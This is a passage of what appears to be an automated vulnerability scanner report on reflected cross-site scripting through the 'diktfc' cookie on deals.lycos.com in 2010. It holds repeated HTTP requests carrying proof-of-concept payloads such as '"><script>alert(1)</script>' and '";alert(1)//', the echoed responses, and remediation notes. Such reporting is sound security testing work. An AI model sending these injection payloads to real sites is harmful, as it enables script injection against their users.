Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e5a9"%3balert(1)//21691b5acad was submitted in the diktfc cookie. This input was echoed as 6e5a9";alert(1)//21691b5acad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9"%3balert(1)//21691b5acad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17638
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e5"><script>alert(1)</script>04a9fd962a5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14597"%3balert(1)//71a486517fb was submitted in the diktfc cookie. This input was echoed as 14597";alert(1)//71a486517fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597"%3balert(1)//71a486517fb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18181
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ce5"><script>alert(1)</script>570dcb9c64e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46acf"%3balert(1)//6a7aece2843 was submitted in the diktfc cookie. This input was echoed as 46acf";alert(1)//6a7aece2843 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf"%3balert(1)//6a7aece2843; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17963
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4046a"><script>alert(1)</script>6e957a235e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f2f"%3balert(1)//00ef4809ce3 was submitted in the diktfc cookie. This input was echoed as c8f2f";alert(1)//00ef4809ce3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f"%3balert(1)//00ef4809ce3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17740
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a9f"><script>alert(1)</script>2045b97a5bb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84305"%3balert(1)//a3738040bfc was submitted in the diktfc cookie. This input was echoed as 84305";alert(1)//a3738040bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305"%3balert(1)//a3738040bfc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16787
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8753a"><script>alert(1)</script>f676558b74c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
//b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fe7f"%3balert(1)//d72ebf3820a was submitted in the diktfc cookie. This input was echoed as 1fe7f";alert(1)//d72ebf3820a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f"%3balert(1)//d72ebf3820a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17757
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298cd"%3balert(1)//2c40b7b6bb2 was submitted in the diktfc cookie. This input was echoed as 298cd";alert(1)//2c40b7b6bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd"%3balert(1)//2c40b7b6bb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15194
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b34d0"><script>alert(1)</script>e18b336f5a9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content- ...[SNIP]...
